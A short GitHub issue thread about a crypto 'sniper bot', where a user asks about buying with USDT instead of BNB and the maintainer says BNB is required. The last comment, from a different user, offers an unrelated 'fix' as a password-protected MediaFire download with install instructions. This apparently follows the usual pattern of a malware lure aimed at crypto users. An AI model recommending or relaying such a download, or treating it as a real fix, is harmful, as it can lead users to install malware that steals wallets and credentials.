### ISSUE TITLE
Buy using usdt instead of bnb

### ISSUE THREAD

**Issue by Boody1990** [DexSniping/DexSniping-BSC-ERC20-Telegram-Alerts#5]
Can it buy using usdt instead of bnb ?

**Comment by DexSniping** [comment]
Hello!

No you need to buy BNB, it's better and faster for swap. Better for a sniper bot :)

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
